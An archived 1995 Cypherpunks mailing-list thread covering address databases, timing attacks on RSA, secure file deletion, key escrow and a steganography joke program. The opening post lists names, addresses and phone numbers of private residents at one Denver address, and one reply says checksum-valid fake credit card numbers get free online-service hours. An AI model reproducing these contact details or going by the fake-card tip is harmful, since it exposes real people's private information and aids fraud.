Denver, CO  80231-4826
303-755-9989

Sunburst Apartments
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-0124

Terry Robert D
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-4287

Triplette J
8525 E Hampden Ave
Denver, CO  80231-4826
303-369-7795

Vestal Patrick J
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-0245

Whaley Leigh
8525 E Hampden Ave
Denver, CO  80231-4826
303-755-1915

White Epsie
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-1368

Williams Myrtle M
8525 E Hampden Ave
Denver, CO  80231-4826
303-695-1074

Winfield Kurt
8525 E Hampden Ave
Denver, CO  80231-4826
303-755-4306

Zullo Marie J
8525 E Hampden Ave 117
Denver, CO  80231
303-368-1057

- -------------

      That took about 15 seconds, but I'm a fast typer. YMMV.

Hieronymous (*not* one of LD's neighbors)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNBgWr3g0mNE55u1AQEugwH8DKWGsVXd9tfK97RICTeddGJUuQFFwrP3
WoQXrrxNcvGRQ8bzZ3ANH1FPAAiCt7WB+8OF3MA20H/Ma1XuiU8ljw==
=QTb4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Fri, 15 Dec 1995 09:01:08 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <9512142357.AA29905@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


  The best way to circumvent something like the below occurring is to have
your home phone number listed under a pseudonym with no street address listed -
and block out *69 and caller-id.  If some entity wants your phone number,
give them your business number.

>>Something of privacy interest happened to me yesterday.  I phoned
>>a company to ask for a copy of their catalog.  The phone clerk
>>asked for my last name and zip code.  After receiving that info,
>>the clerk asked me, "Is this your full name and address?" and
>>then gave them both correctly.  I was taken aback.
>>Does anyone know how this trick was done?
>
>    What trick? For ~$150, you can buy a CD-ROM-set DB with every listed
>>phone number in the U.S. on it, faxes too;
>


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 15 Dec 1995 04:20:43 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Netscape announces position against GAK
Message-ID: <199512141900.UAA16686@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Dec 1995 08:20:46, amp <Alan.Pugh@internetMCI.COM> writes (in part):

>i'm not entirely satisfied with netscape's response, but then, i
>didn't expect to be. i _expect_ weasling from corporations that have
>made the 'big time'. this is the way life is i suppose. what i'd like
>to see would be more companies that have an interest in the security
--snip--
>amp
><0003701548@mcimail.com> (since 10/31/88)
><alan.pugh@internetmci.com>
>Current PGP Key = 57957C9D
>December 13, 1995   18:51

i cannot fault you too much for not using capitals, since it is a well know
fact  that network mci charges extra for their use.  however, i do believe
that your posts might be taken more seriously were they easier to read.
maybe it is time to shell out the extra $$ and buy some capital letters.

        hooker







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jonathan M. Bresler" <jmb@FreeBSD.ORG>
Date: Fri, 15 Dec 1995 10:13:47 +0800
To: Sten Drescher <dreschs@austnsc.tandem.com>
Subject: Re: kocher's timing attack
In-Reply-To: <55loofy5qn.fsf@galil.austnsc.tandem.com>
Message-ID: <Pine.BSF.3.91.951214200818.22735C-100000@Aspen.Woc.Atinc.COM>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Dec 1995, Sten Drescher wrote:

> On Firewalls, "Jonathan M. Bresler" <jmb@FreeBSD.ORG> said:
> 
> JMB> regarding kocher's timing attack paper:
> 
> JMB> RSA attack.  only known ciphertext is needed.  dont know how many
> JMB> known ciphertexts are required (related to key size surely).  the
> JMB> paper's example is digital signature, rephrase that to Alice signs
> JMB> Bob's public key certifying that (you know the story).  After
> JMB> several large key signing parties hundreds of known ciphertexts
> JMB> could have been generated using Alice's key--each one a public key
> JMB> of someone else.  over several years it piles up.  the known
> JMB> ciphertexts can be tested/analyzed to yield Alice's secret key.
> JMB> ouch.  ;/
> 
> 	Are you sure about this?  It would seem that the same principle
> would then apply to signed messages as well, and I find it a bit hard to
> believe that signing messages would make ones key pair vulnerable.

	no, i am not sure.  but after reading the paper carefully that is 
what i conclude.  on page 4 start of the 4th paragraph "The Chinese 
Remainder Theorem RSA attack can also be adapted to use only known 
ciphertext, and thus can be used to attack RSA digital signatures."

	the key here is "known ciphertext": you have both the message and 
its encrypted version.  When Alice signs Bob's public key, with her 
private key of course, she is encrypting Bob's public key.  this allows 
Charlie to use Alice's public key to decrypt the signature, recovering a 
message that is identical to Bob's public key.  that's the proof that 
Alice was the signer.

	no, i am not sure.   anyone see holes in this?


Jonathan M. Bresler        FreeBSD Postmaster         jmb@FreeBSD.ORG
play go. ride bike. hack FreeBSD.--ah the good life 
i am moving to a new job.                 PLEASE USE: jmb@FreeBSD.ORG





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Dec 1995 17:35:52 +0800
To: cypherpunks@toad.com
Subject: "Strongly Voluntary" Key Escrow
Message-ID: <acf62a67000210041e61@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:18 PM 12/14/95, jim bell wrote:

>I disagree.  The issue is one that might be called "standing."  Who,
>exactly, is responsible to whom in such an arrangement.  Let's suppose key
>escrow (for keys for non-exported encryption devices) is REALLY VOLUNTARY.
>In that case, the escrow agent's only legal  responsibility is to the owner
>of the encryption device.  The government isn't a party to this voluntary
>arrangement, and thus hasn't a complaint if the escrow agent refuses to comply.
>
>I could, for example, enter into a voluntary arrangement with an escrow
>agent so that he would be obligated to erase the key no more nor less than 5
>days after he received it.  If he  did so 1 day after, and I needed the key,
>he would have breached his obligation to ME, but not to the government.
>Likewise, if he failed to erase the key, he would likewise be breaching his
>agreement with me.

I agree with this analysis. When key escrow was being debate in the summer
of '94 here, I called this criterion the basis for a "strongly voluntary"
system. Specifically, that one could have the bit bucket as an "escrow
agent," with of course no retrieval by the government. Or one's lawyer, or
one's spouse, or an offshore bank, and so on.

All of these are "voluntary" key escrow (though I hate that misuse of the
word "escrow") systems. None of them involve government certification, and
there are few circumstances where I think "government certification" is
even useful, let alone necessary.

Any scheme in which the government interjects itself in what would not
normally involve them can hardly be said to be strictly voluntary.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 15 Dec 1995 13:49:46 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
In-Reply-To: <m0tQMvq-00090LC@pacifier.com>
Message-ID: <199512150148.UAA00854@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:
> It _is_ less voluntary, because it interferes with my right to escrow my key
> with an organization that is willing to take the dispute to arbitrary levels
> of uncooperativeness with the government.  I might insist, for example, that
> the organization only store the key outside the country (beyond the reach of
> US Courts) and require MY PERMISSION for them to release it to the
> government.  I might also insist that they further encode the key so that
> only an independent foreign organization (out of reach of US courts) could
> provide the key to decrypt it.
> 
> If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary
> restrictions should be do-able.

Unless I've missed something large, you can have an _uncertified_ key escrow 
agent store your keys in Fidel Castro's beard, and only release them with
written permission from your goldfish. 

Whether or not you use a certified key escrow agency would remain your 
choice, AFAIK.

I'm not expressing support for the certification standards that have been
presented. But I don't consider it cause for great alarm that the USG wants
to play in the escrow agent rating bureau business.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 15 Dec 1995 11:35:22 +0800
To: cypherpunks@toad.com
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <Pine.ULT.3.91.951214104824.5962B-100000@Networking.Stanford.EDU>
Message-ID: <B9N5FD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> writes:
> AOL will, however, accept a bogus name, address, and credit card number
> (as long as the checksum is correct) for the initial ten free hours plus
> however long it takes for the first bill to bounce.
>
> America "On Line" will also accept direct debits from an untraceable bank
> account (for this they charge a little extra).

This used to be the case.  However they've fixed this, and won't let you
use your 10 free hours until they have a valid number.

I've been told that Compuserve still accepts any credit card number as long
as the checksum is valid.  I haven't tried it. (Note that as long as you're
only using the "free hours", you're not stealing any services.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 16 Dec 1995 07:46:44 +0800
To: cypherpunks@toad.com
Subject: Re: Pornographic stories
In-Reply-To: <199512130602.WAA02645@netcom9.netcom.com>
Message-ID: <Dgo5FD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jadestar@netcom.com (JaDe) writes:
> >
> > Daniel Miskell <DMiskell@envirolink.org> writes:
> >>>I'm sure.
>
> > I too fail to see the cryptorelevance of this thread... Unless
> > alt.sex.stories is used for steganography... Alice wants to send a
> > secret message to Bob, so she posts a porn story to alt.sex.stories,
> > where the key phrase is "That was the best sex I've ever had", which
> > sounds like a mild hyperbole to most people;
>
> 	I like the stegonography angle.  However I'd encode the
> 	actual message contents into the typos.  Filter out the
> 	typos to retrieve your crypto-text.

Wouldn't text with a lot of typoes look suspicious? For ultimate silliness,
I've put together the following program to encode 8 bits at a time in an
R-rated sentence:

#include <stdio.h>

#define BIT(c,n) ((c>>n)&1)

const char*bits[]={
"Senator Exon",                         "L.Ron Hubbard",
"made passionate love to",              "had great sex with",
"Hillary Klinton",                      "J.D.Falk",
"experienced",                          "gave her",
"six",                                  "twelve",
"in",                                   "during",
"one",                                  "a single",
"night",                                "weekend"};

void stegaporn(int c)
{

printf("%s %s %s and %s %s orgasms %s %s %s.  ",
bits[BIT(c,7)], bits[2+BIT(c,6)], bits[4+BIT(c,5)], bits[6+BIT(c,4)],
bits[8+BIT(c,3)], bits[10+BIT(c,2)], bits[12+BIT(c,1)], bits[14+BIT(c,0)]);
}

int main(void)
{
int c;

while (EOF!=(c=getchar()))
 stegaporn(c);

return(0);
}

> 	Ultimately I think that the whole issue of legal cryptography
> 	actually boils down to this:
>
> 		If you illegalize strong crypto than criminals will
> 		simply resort to steganography and "hidden" channels
> 		of communication (in which they can also embed/tunnel
> 		the crypto-text of their strongly encrypted data).
>
> 		Therefore all you've done is create a lesser crime
> 		for the real criminals and make people with valid
> 		(non-criminal) uses of the technology into criminals.
>
> 	Unfortunately this reasoning doesn't help at all with our
> 	(U.S.) legislature.  There is some hidden aggenda as to
> 	why "they" really want strong cryptography to be difficult
> 	for the average user to obtain.  I have a uniquely hard time
> 	believing that "they" are merely concerned that "we" might
> 	be pursuing simple privacy (even if cryptography were already
> 	illegal I could use it for years and never get "caught."
> 	so long as I was using non-broadcast channels and communicating
> 	with "trusted" associates (fellow "crypto-criminals")
>
> 	In fact I've suggested to several people that we start
> 	a dial-up uucp revival for this and related reasons.  (If
> 	the number of users/webpages and the bandwidth usage continues
> 	to increase at the recent rates -- without a corresponding
> 	improvement in the infrastructure we'll probably all want to
> 	go back to uucp for mail and news anyway.  Old fashioned dial-up
> 	may be faster than T1 access in a few years and direct point-to-
> 	point uucp over ISDN is probably faster already.
>
> 	So:
>
> 		What is the "real" reason for opposition to 	
> 		 strong crypto?  Who "really" benefits?  (and please
> 		 don't mention the LE types 'cause I don't believe it).
>
> 	and:
> 		Anyone else want to participate in the great '90's
> 		uucp revival?  I'm in Santa Clara and could use
> 		some feeds and some help with the setup.

I'm all for it. My site is connected to the rest of the world via dial-up
UUCP, I haven't touched the setup in 5 years, and am not planning to.

It might be interesting to have a variation of dial-up UUCP where site 1
passes encrypted stuff to site 2 and doesn't quite know what site 3 they're
supposed to go on to. Sort of like the remailers with encryption.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 15 Dec 1995 11:01:57 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: kocher's timing attack
In-Reply-To: <Pine.BSF.3.91.951214200818.22735C-100000@Aspen.Woc.Atinc.COM>
Message-ID: <199512150203.VAA00869@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan M. Bresler writes:
[...on firewalls...]
> regarding kocher's timing attack paper:
>
> RSA attack.  only known ciphertext is needed.  dont know how many
> known ciphertexts are required (related to key size surely).  the
> paper's example is digital signature, rephrase that to Alice signs
> Bob's public key certifying that (you know the story).  After
> several large key signing parties hundreds of known ciphertexts
> could have been generated using Alice's key--each one a public key
> of someone else.  over several years it piles up.  the known
> ciphertexts can be tested/analyzed to yield Alice's secret key.

[...later on cypherpunks...]

> no, i am not sure.  but after reading the paper carefully that is 
> what i conclude.  on page 4 start of the 4th paragraph "The Chinese 
> Remainder Theorem RSA attack can also be adapted to use only known 
> ciphertext, and thus can be used to attack RSA digital signatures."
> 
> 	the key here is "known ciphertext": you have both the message and 
> its encrypted version.  When Alice signs Bob's public key, with her 
> private key of course, she is encrypting Bob's public key.  this allows 
> Charlie to use Alice's public key to decrypt the signature, recovering a 
> message that is identical to Bob's public key.  that's the proof that 
> Alice was the signer.
> 
> 	no, i am not sure.   anyone see holes in this?

You are overlooking the main point that this is a _timing_ attack. Unless
Bob gets to time Alice carefully when she signs his public key (or a message),
there is no basis for the attack. For certificate servers this may well be
an issue, but most individuals don't sign things online. Just beware of
people with extremely precise stopwatches at key signing parties ;>

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Fri, 15 Dec 1995 11:33:11 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512150303.VAA10066@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


>  The best way to circumvent something like the below occurring is to have
>your home phone number listed under a pseudonym with no street address listed -
>and block out *69 and caller-id.  If some entity wants your phone number,
>give them your business number.

Another "best way" is to make all calls that you want to be personal with
a cellular phone.  Most cellular systems don't send ANI and do not provide
any type of billing information to the phone company.  The number is also by
nature unlisted and the only way to get it is by you or the cellular 
carrier.  If the cellular carrier gives your number out without your
permision or a court order they are in BIG trouble..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 15 Dec 1995 11:01:11 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Secured RM ? (source) (bounce-fwd)
Message-ID: <199512150208.VAA00886@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From MAILER-DAEMON Thu Dec 14 21:05:20 1995
> 
>    ----- Transcript of session follows -----
> 550 hellspawn.gate.net (tcp)... 550 Host unknown
> 554 <root@HellSpawn.gate.net>... 550 Host unknown (Authoritative answer from name server)
> 
>    ----- Unsent message follows -----
> Subject: Re: Secured RM ? (source)
> To: root@HellSpawn.gate.net (root)
> 
> Have you considered using "pgp -w filename" ?  It doesn't take wildcards,
> but that's arguably a feature :)

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 16 Dec 1995 13:21:00 +0800
To: root@HellSpawn.gate.net (root)
Subject: Re: Secured RM ? (source)
In-Reply-To: <Pine.LNX.3.91.800121064335.1068A-100000@HellSpawn.gate.net>
Message-ID: <199512150218.VAA14539@homeport.org>
MIME-Version: 1.0
Content-Type: text


| 
| While we're here..  I havn't been able to find anyone on the planet who's 
| seen or heard of a linux un-remove, which makes testing my code very 
| tricky.  If anyone can point me at it I'd apreciate it. Hell, if someone 
| can definitively say they've /seen/ such a thing it'd be nice. So far 
| i've found one person who insists that his system admins sisters 
| boyfriends cousin from Saint Petersburg has been using un-rm for unix for 
| years. *sigh* 


	From comp.unix.questions FAQ:
	(http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html)

	MIT's Project Athena has produced a comprehensive
      delete/undelete/expunge/purge package, which can serve as a
      complete replacement for rm which allows file recovery.  This
      package was posted to comp.sources.misc (volume 17, issue
      023-026)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Fri, 15 Dec 1995 06:06:32 +0800
To: hoz@univel.telescan.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <9512141637.AA11479@toad.com>
Message-ID: <m0tQKk7-0002e8C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "rick" == rick hoselton <hoz@univel.telescan.com> writes:

    rick> On another note, timing attacks would not seem to work
    rick> against most DES implementations, hardware or software.  The
    rick> time to execute each round does not seem to depend on the
    rick> plaintext or the key.  It could be made to, of course, but
    rick> unless I'm missing something, the "natural" way to code it,
    rick> or to construct hardware for it, is not time dependent.

Someone mentioned measuring power consumption instead of execution
time. I think the same statistics should apply in that case.

Of course this attack requires knowledge of the chip design, but that
should be possible to gain. It's certainly easier than reading
information from a protected EEPROM.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMNCQGEyjTSyISdw9AQEt6wP+LWttWh2i9S8G/zvjU0cM0Rcw4uA/JGRo
Qb0QrTfEZ6NI/oCWe4JTZCEQCgGZJ9ApoZMERHTGi4568dD3Cn3jZCkGVYfbeYxq
ShOij0DaxkrjaRTsRgmhHVainB1bv5JE3heXYYRgGTLIDkclGtayz8VON3Yr7Oop
mSBr/Fot5B4=
=YOEs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Fri, 15 Dec 1995 13:04:54 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE? (fwd)
Message-ID: <m0tQRM9-0005BvC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From toad.com!owner-cypherpunks Thu Dec 14 17:36:57 1995
> Date: Thu, 14 Dec 1995 14:50:19 -0800 (PST)
> From: Sandy Sandfort <sandfort@crl.com>

> 
> So far, no one has come up with anything stronger than specula-
> tion about my database question.  Some "anonymous" told me how
> easy it was to buy *phone numbers* on CD-ROMs.  Great, but I
> didn't give the guy my phone number.
> 

It was probably a shrewd guess on the part of the phone peon,
combined with a fresh database from the telephone company. Are 
there many people in your zip code with the same last name as
yourself? If not, that pretty much answers your question right
there.

When you pull a credit report from TRW's database, the only
information TRW needs is the first four (?) letters of the last
name, the initial of the first name, the numeric part of the
address, the first character of the street name, and the zip code.
I'll leave it to the experts in information theory to explain
that in rigorous technical detail.

Given only a last name and a zip code, I wouldn't be surprised
if you found the proper individual most of the time. (If you're in
Minnesota and you're looking for Swenson in 55419, you may need
more info, but not much.)

Another anecdote to add to the pile: I moved to a new apartment
last May. For various reasons, I got an unlisted number, and had
my credit card bills and magazine subscriptions sent to a mail
drop (MBE). The phone, gas, electric and cable bills went to the
new apartment, not to the mail drop.

I didn't get any junk mail at the new apartment until a couple
of weeks ago--right after I changed my subscription to Byte to
come here (now I'm getting AOL disks, etc.). Before that, I got
no junk mail here (except from the phone or cable company). I
get almost no telemarketing calls; I used to get at least one a
night with a listed phone number.

My experience appears to be that credit card and magazine companies
sell lists; utility and cable companies don't. Mass mailers must
not get unlisted number customers on the lists they get from the
phone company. Again, this is only from my experience, all disclaimers
apply.

And all this has no relevance whatsoever when you bring the 
government into the picture.

Crypto relevance? Well, I did mention information theory...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (The user formerly known as Leslie Todd Masco)
Date: Fri, 15 Dec 1995 12:38:59 +0800
To: cypherpunks@toad.com
Subject: [UNIX] Re: Secured RM ? (source)
Message-ID: <199512150325.WAA01214@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199512150218.VAA14539@homeport.org>,
Adam Shostack <adam@lighthouse.homeport.org> wrote:
>| 
>| While we're here..  I havn't been able to find anyone on the planet who's 
>| seen or heard of a linux un-remove, which makes testing my code very 
>| tricky. 
>	From comp.unix.questions FAQ:
>	(http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html)
  [Info about delete/undelete/expunge/purge del]

That's not very useful in this context: all it does is move files to
.#{oldname} and then later remove them.

I'd suggest that anybody interested in this topic under UNIX examine the
vnode structures and understand how the filesystem keeps file lists.  Many
vendor UNIces have fairly well commented header files.

{Only marginally cypherpunk-related, in the 'Security in the real world'
 category.}
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNDqmSoZzwIn1bdtAQGorwF+KsU/UZom/+C8ldvzKDPajDh6fiVtg1K1
kxTyLGyAjf5W+SNRM1f6kU5YdJlUmZxP
=yo70
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Fri, 15 Dec 1995 17:31:52 +0800
To: cypherpunks@toad.com
Subject: Re: Secured RM ? (source)
In-Reply-To: <199512150218.VAA14539@homeport.org>
Message-ID: <Pine.A32.3.91.951214222509.43804A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 14 Dec 1995, Adam Shostack wrote:

> 	From comp.unix.questions FAQ:
> 	(http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html)
> 
> 	MIT's Project Athena has produced a comprehensive
>       delete/undelete/expunge/purge package, which can serve as a
>       complete replacement for rm which allows file recovery.  This
>       package was posted to comp.sources.misc (volume 17, issue
>       023-026)

Well, thanks for trying..  The athena package isnt an undelete program, 
its a replacement for rm that copies rm'd files into a trashcan directory 
which is expunged at regular intervals... *sigh*

Still looking..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sat, 16 Dec 1995 12:38:55 +0800
To: root <root@HellSpawn.gate.net>
Subject: Re: Secured RM ? (source)
In-Reply-To: <Pine.LNX.3.91.800121064335.1068A-100000@HellSpawn.gate.net>
Message-ID: <WAA10910.199512150328@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.LNX.3.91.800121064335.1068A-100000@HellSpawn.gate.net>, root w
rites:
>
>OK ... here we go.. Based on discussion on this list this is what I 
>hacked out to (hopefully) more securely remove a file under unix. 
>I'd really apreciate any input, but my main interest is in the security of 
>the protocol in general and not the sloppy and embarassing C 
>programming.. :) 

Well it seems to assume that it only needs to write 1024 bytes past the
end of the file.  You either don't need to write any bytes at all past 
the end, or you need to write one "block" past the end (normally 8K,
but it varies), you can use fsstat(2) on many systems to find the block
size for a filesystem.

Secondly you need to flush the data out to the file (use fflush(3), and
fsync(2) if available, otheruse call sync(2) *twice*).  If you don't some
small set of Unix systems may notice that you are writing to a file that
no longer exists, and not do the writes at all.

Thirdly you should make several passes over the file, writing diffrent
patterns on each pass (and remember the flush & sync after each pass -
while it is uncommon for Unix systems to supres writes to unlinked files
it is extreamly common for them to detect multiple writes to the same part
of a file, and only do the last one).

Forth - and this is the kicker - there is no gaurentee that the filesystem
itself won't keep a copy of the old data for some reason.  Three examples:

 * a compressed filesystem may write the new data elsewhere because it
 compresses diffrently from the old data - you should be able to defeat
 this by filling the disk several times with random paterns

 * the log structured filesystem (LFS) *will* write the new data elsewhere,
 and the space the old data is on will not be overwritten untill the
 cleaner comes and examines the part of the disk it is on - again filling the
 disk several times with random patterns should cause an overwrite

 * NetApp's NFS appliance ("the toaster") can (and normally is) configured
 to take "snapshots" of the filesystem at various times, this makes the
 blocks the file is currently on read-only, and any ovewrites will merely
 allocate new space.  The old copy of the file will be readable for some
 peroid of time (frequently up to a week) under a diffrent name - here you
 will be unable to fill the disk (unless you are the NetApp admin - then
 you can delete the appropriate snapshots and fill the disk...)


While we are at it you probbably want to use stat(2) to find the length
of the file, and you can get far more I/O if you allocate a sizeable
chunk of memory (say 1K, or 8K) and use writev(2) to shove multiple copies
of it out per syscall...    and some indenting on the code would make
it more readable (and simpler for you to write as well).

>While we're here..  I havn't been able to find anyone on the planet who's 
>seen or heard of a linux un-remove, which makes testing my code very 
>tricky.  If anyone can point me at it I'd apreciate it. Hell, if someone 
>can definitively say they've /seen/ such a thing it'd be nice. So far 
>i've found one person who insists that his system admins sisters 
>boyfriends cousin from Saint Petersburg has been using un-rm for unix for 
>years. *sigh* 

I don't know of a real un-rm.  In "the old days" there was a fsdb (filesystem
debugger) that could be used to alter the filesystem at a low level.  If
you knew enough you could "un-rm" a file.  It had to be a very valuable
file to be worth it!).  At some sites they alias rm to do something like
"mv $1 .$1.deleted", making an un-rm is left as an exercize for the
intrested reader.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Fri, 15 Dec 1995 15:19:17 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
Message-ID: <9512150734.AA0051@cnct-gw.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks (belatedly) for posting this, Russell.  Who was it said, "Follow the
money."  Great stuff.

For a good time, call the EFF about these folks.  For a better time, call
the ACLU.

It might be hilarious to make some inquiries around Stanford...  Maybe Rich 
Graves can give us the poop.

Best,  Clark

Probably time someone wrote an expose of industry and cryptocrats "hacking"
public policy groups.  Wonder where one could PLAGIARIZE such tidbits?  ;-)

(apologies -- "plagiarize" is an inside joke for the filterslugs ;-)


//--- forwarded letter ---------------------------------------
> MIME-Version: 1.0
> Date: Tue, 21 Nov 95 12:01:10 -0500
> From: JWRCLUM@aol.com
> To: cypherpunks@toad.com
> Subject: Fwd: Corporate Crime and CDT Funding on behalf of so-called 
medical privacy

>      The following article appeared in the current issue of
> Corporate Crime Reporter (Volume 9, Number 44, November 20, 1995,
> page one).  It is redisseminated on the Internet with the 
> permission of CCR.
> 
> SELF-PROCLAIMED "PUBLIC INTEREST" GROUP  HEAVILY FUNDED BY
> COMPUTER, TELECOMMUNICATIONS, DATABANK CORPORATIONS THAT WOULD
> BENEFIT FROM "MEDICAL PRIVACY" LEGISLATION GROUP SUPPORTS --
> EQUIFAX, TRW, DUNN & BRADSTREET IN THE MIX                                 
> 
>      The Center for Democracy & Technology (CDT), a self-
> proclaimed "public interest organization," is in fact heavily
> funded by large private computer, telecommunications, and
> databank corporations.
>      Funders of CDT, a two-year old Washington, D.C.-based
> advocacy organization, include Dunn & Bradstreet Corp., Equifax
> Inc., and TRW Information Services, three large databank
> corporations that stand to benefit from federal legislation CDT
> actively helped shaped and is shepherding through Congress.
>      This year, CDT has received $699,643 from more than 30 large
> corporations, including $100,000 from Microsoft, $75,000 from
> AT&T, $60,000 from Bell Atlantic, $50,000 from Apple Computer,
> $25,000 from IBM, $10,000 from TRW Information Services, $10,000
> from Dunn & Bradstreet, $5,000 from Direct Marketing Association,
> and $5,000 from Equifax Inc. (For a complete list of CDT's
> funders, see At A Glance, page 16)
>      At a hearing before the Senate Labor and Human Resources
> Committee last week, CDT deputy director Janlori Goldman said
> that CDT "strongly supports" legislation, S. 1360, sponsored by
> Senators Robert Bennett (R-Utah) and Patrick Leahy (D-Vermont),
> because it represents "the most comprehensive and strong privacy
> bill the Congress has yet considered in this area."
>      But opponents of the bill argue that the legislation is not
> a privacy statute at all, but instead is a vehicle that would
> legitimize the creation of large computerized databanks of
> personal medical information, thus benefitting those companies
> like TRW and Equifax that give financial support to CDT. The
> legislation would allow for broad, unauthorized searches of those
> databanks, opponents claim.
>      In an interview, Goldman told Corporate Crime Reporter that
> all of CDT's corporate funding is earmarked for other projects
> and that none of the corporate funding is supporting her work on
> the medical privacy bill.
>      "The corporate funding is not related at all, in any way
> shape or form to my work on this bill," Goldman said. "The reason
> we are doing this bill is that I've worked on privacy issues for
> a decade. The most important privacy issue to work on is the
> passage of the medical records privacy legislation. That is a
> very sincere issue for me."
>      "None of the corporate support that CDT gets is related to
> my work on this bill," Goldman emphasized. "None. Zippo."
>      CDT's executive director, Jerry Berman agreed. "We have no
